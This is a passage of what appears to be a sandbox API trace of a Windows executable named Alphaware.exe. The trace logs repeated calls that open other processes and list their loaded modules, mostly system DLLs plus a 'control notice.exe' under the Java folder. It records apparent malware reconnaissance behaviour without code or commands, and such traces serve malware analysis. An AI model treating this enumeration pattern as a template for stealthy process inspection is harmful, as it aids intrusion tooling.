(cb=0x804) returned 0x780c10 [0044.055] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0044.056] CoTaskMemFree (pv=0x780c10) [0044.056] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.056] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0044.060] CoTaskMemFree (pv=0x780c10) [0044.060] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24e5d70, cb=0x18 | out: lpmodinfo=0x24e5d70*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0044.062] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.062] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0044.063] CoTaskMemFree (pv=0x780c10) [0044.063] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.063] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0044.065] CoTaskMemFree (pv=0x780c10) [0044.065] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24e7f30, cb=0x18 | out: lpmodinfo=0x24e7f30*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0044.066] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.066] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0044.068] CoTaskMemFree (pv=0x780c10) [0044.068] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.068] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0044.069] CoTaskMemFree (pv=0x780c10) [0044.069] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc0d0000, lpmodinfo=0x24ea230, cb=0x18 | out: lpmodinfo=0x24ea230*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0044.071] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.071] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0044.072] CoTaskMemFree (pv=0x780c10) [0044.072] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.072] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0044.074] CoTaskMemFree (pv=0x780c10) [0044.074] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbca0000, lpmodinfo=0x24ec3f0, cb=0x18 | out: lpmodinfo=0x24ec3f0*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0044.076] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.076] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbca0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0044.077] CoTaskMemFree (pv=0x780c10) [0044.077] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.077] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbca0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0044.079] CoTaskMemFree (pv=0x780c10) [0044.079] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x24ee5b0, cb=0x18 | out: lpmodinfo=0x24ee5b0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0044.080] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.080] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0044.082] CoTaskMemFree (pv=0x780c10) [0044.082] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.082] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0044.084] CoTaskMemFree (pv=0x780c10) [0044.084] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa950000, lpmodinfo=0x24f0770, cb=0x18 | out: lpmodinfo=0x24f0770*(lpBaseOfDll=0x7fefa950000, SizeOfImage=0xb000, EntryPoint=0x7fefa9548d8)) returned 1 [0044.086] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.086] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa950000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="HotStartUserAgent.dll") returned 0x15 [0044.087] CoTaskMemFree (pv=0x780c10) [0044.088] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.088] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa950000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\HotStartUserAgent.dll" (normalized: "c:\\windows\\system32\\hotstartuseragent.dll")) returned 0x29 [0044.090] CoTaskMemFree (pv=0x780c10) [0044.090] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa890000, lpmodinfo=0x24f2960, cb=0x18 | out: lpmodinfo=0x24f2960*(lpBaseOfDll=0x7fefa890000, SizeOfImage=0xb000, EntryPoint=0x7fefa891290)) returned 1 [0044.092] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.092] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa890000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="MsCtfMonitor.dll") returned 0x10 [0044.097] CoTaskMemFree (pv=0x780c10) [0044.098] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.098] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa890000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll")) returned 0x24 [0044.100] CoTaskMemFree (pv=0x780c10) [0044.100] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa850000, lpmodinfo=0x24f4b40, cb=0x18 | out: lpmodinfo=0x24f4b40*(lpBaseOfDll=0x7fefa850000, SizeOfImage=0x3d000, EntryPoint=0x7fefa851bdc)) returned 1 [0044.101] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.101] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa850000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="MSUTB.dll") returned 0x9 [0044.103] CoTaskMemFree (pv=0x780c10) [0044.103] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.103] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa850000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSUTB.dll" (normalized: "c:\\windows\\system32\\msutb.dll")) returned 0x1d [0044.106] CoTaskMemFree (pv=0x780c10) [0044.106] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x24f6d00, cb=0x18 | out: lpmodinfo=0x24f6d00*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0044.107] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.107] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0044.110] CoTaskMemFree (pv=0x780c10) [0044.110] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.110] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0044.112] CoTaskMemFree (pv=0x780c10) [0044.112] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x24f8ec0, cb=0x18 | out: lpmodinfo=0x24f8ec0*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0044.114] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.114] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0044.116] CoTaskMemFree (pv=0x780c10) [0044.116] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.116] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0044.118] CoTaskMemFree (pv=0x780c10) [0044.118] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa830000, lpmodinfo=0x24fb090, cb=0x18 | out: lpmodinfo=0x24fb090*(lpBaseOfDll=0x7fefa830000, SizeOfImage=0x18000, EntryPoint=0x7fefa831630)) returned 1 [0044.121] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.121] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa830000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="PlaySndSrv.dll") returned 0xe [0044.124] CoTaskMemFree (pv=0x780c10) [0044.124] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.124] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa830000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll")) returned 0x22 [0044.126] CoTaskMemFree (pv=0x780c10) [0044.126] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x24fd260, cb=0x18 | out: lpmodinfo=0x24fd260*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0044.128] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.128] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0044.130] CoTaskMemFree (pv=0x780c10) [0044.130] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.130] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0044.132] CoTaskMemFree (pv=0x780c10) [0044.132] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x24ff410, cb=0x18 | out: lpmodinfo=0x24ff410*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0044.134] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.134] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0044.137] CoTaskMemFree (pv=0x780c10) [0044.137] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.137] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0044.139] CoTaskMemFree (pv=0x780c10) [0044.139] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef92d0000, lpmodinfo=0x25015e0, cb=0x18 | out: lpmodinfo=0x25015e0*(lpBaseOfDll=0x7fef92d0000, SizeOfImage=0xe000, EntryPoint=0x7fef92d5d28)) returned 1 [0044.141] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.141] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef92d0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="dimsjob.dll") returned 0xb [0044.144] CoTaskMemFree (pv=0x780c10) [0044.144] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.144] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef92d0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll")) returned 0x1f [0044.147] CoTaskMemFree (pv=0x780c10) [0044.147] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x25037a0, cb=0x18 | out: lpmodinfo=0x25037a0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0044.149] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.149] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0044.151] CoTaskMemFree (pv=0x780c10) [0044.151] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.152] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0044.154] CoTaskMemFree (pv=0x780c10) [0044.154] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb4e0000, lpmodinfo=0x2505960, cb=0x18 | out: lpmodinfo=0x2505960*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0044.156] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.156] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0044.159] CoTaskMemFree (pv=0x780c10) [0044.159] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.159] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0044.162] CoTaskMemFree (pv=0x780c10) [0044.162] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x2507b30, cb=0x18 | out: lpmodinfo=0x2507b30*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0044.164] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.164] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0044.167] CoTaskMemFree (pv=0x780c10) [0044.167] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.167] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0044.170] CoTaskMemFree (pv=0x780c10) [0044.170] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef97b0000, lpmodinfo=0x2509cf0, cb=0x18 | out: lpmodinfo=0x2509cf0*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0044.172] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.172] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef97b0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0044.175] CoTaskMemFree (pv=0x780c10) [0044.175] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.175] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef97b0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0044.177] CoTaskMemFree (pv=0x780c10) [0044.178] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x250c0f0, cb=0x18 | out: lpmodinfo=0x250c0f0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0044.180] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.180] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0044.183] CoTaskMemFree (pv=0x780c10) [0044.183] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.183] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0044.186] CoTaskMemFree (pv=0x780c10) [0044.186] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x250e2a0, cb=0x18 | out: lpmodinfo=0x250e2a0*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0044.189] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.189] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0044.192] CoTaskMemFree (pv=0x780c10) [0044.192] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.192] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0044.195] CoTaskMemFree (pv=0x780c10) [0044.195] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x2510460, cb=0x18 | out: lpmodinfo=0x2510460*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0044.198] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.198] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0044.201] CoTaskMemFree (pv=0x780c10) [0044.201] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.201] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0044.204] CoTaskMemFree (pv=0x780c10) [0044.204] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x2512620, cb=0x18 | out: lpmodinfo=0x2512620*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0044.207] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.207] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0044.210] CoTaskMemFree (pv=0x780c10) [0044.210] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.210] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0044.213] CoTaskMemFree (pv=0x780c10) [0044.213] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5d0000, lpmodinfo=0x25147e0, cb=0x18 | out: lpmodinfo=0x25147e0*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0044.216] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.216] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0044.219] CoTaskMemFree (pv=0x780c10) [0044.219] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.219] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0044.222] CoTaskMemFree (pv=0x780c10) [0044.222] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb330000, lpmodinfo=0x25169b0, cb=0x18 | out: lpmodinfo=0x25169b0*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0044.225] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.225] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb330000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0044.228] CoTaskMemFree (pv=0x780c10) [0044.228] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.228] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb330000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0044.232] CoTaskMemFree (pv=0x780c10) [0044.232] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9230000, lpmodinfo=0x2518b70, cb=0x18 | out: lpmodinfo=0x2518b70*(lpBaseOfDll=0x7fef9230000, SizeOfImage=0x3b000, EntryPoint=0x7fef92322f0)) returned 1 [0044.235] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.235] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9230000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="WINMM.dll") returned 0x9 [0044.238] CoTaskMemFree (pv=0x780c10) [0044.239] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.239] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9230000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINMM.dll" (normalized: "c:\\windows\\system32\\winmm.dll")) returned 0x1d [0044.242] CoTaskMemFree (pv=0x780c10) [0044.242] CloseHandle (hObject=0x218) returned 1 [0044.250] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0044.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x218 [0044.251] EnumProcessModules (in: hProcess=0x218, lphModule=0x251be38, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x251be38, lpcbNeeded=0x41eb20) returned 1 [0044.251] GetModuleInformation (in: hProcess=0x218, hModule=0xad0000, lpmodinfo=0x251c0a8, cb=0x18 | out: lpmodinfo=0x251c0a8*(lpBaseOfDll=0xad0000, SizeOfImage=0x17000, EntryPoint=0xad14a1)) returned 1 [0044.251] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.252] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xad0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="control notice.exe") returned 0x12 [0044.252] CoTaskMemFree (pv=0x780780) [0044.252] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.252] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xad0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Java\\control notice.exe" (normalized: "c:\\program files\\java\\control notice.exe")) returned 0x28 [0044.253] CoTaskMemFree (pv=0x780780) [0044.253] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x251e2c8, cb=0x18 | out: lpmodinfo=0x251e2c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.253] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.253] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.254] CoTaskMemFree (pv=0x780780) [0044.254] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.254] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.255] CoTaskMemFree (pv=0x780780) [0044.255] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2520488, cb=0x18 | out: lpmodinfo=0x2520488*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.255] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.255] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.256] CoTaskMemFree (pv=0x780780) [0044.256] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.256] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.257] CoTaskMemFree (pv=0x780780) [0044.257] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2522648, cb=0x18 | out: lpmodinfo=0x2522648*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.258] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.258] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.259] CoTaskMemFree (pv=0x780780) [0044.259] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.259] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.259] CoTaskMemFree (pv=0x780780) [0044.260] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2524818, cb=0x18 | out: lpmodinfo=0x2524818*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.260] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.260] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.261] CoTaskMemFree (pv=0x780780) [0044.262] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.262] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.262] CoTaskMemFree (pv=0x780780) [0044.262] CloseHandle (hObject=0x218) returned 1 [0044.264] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0044.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x218 [0044.264] 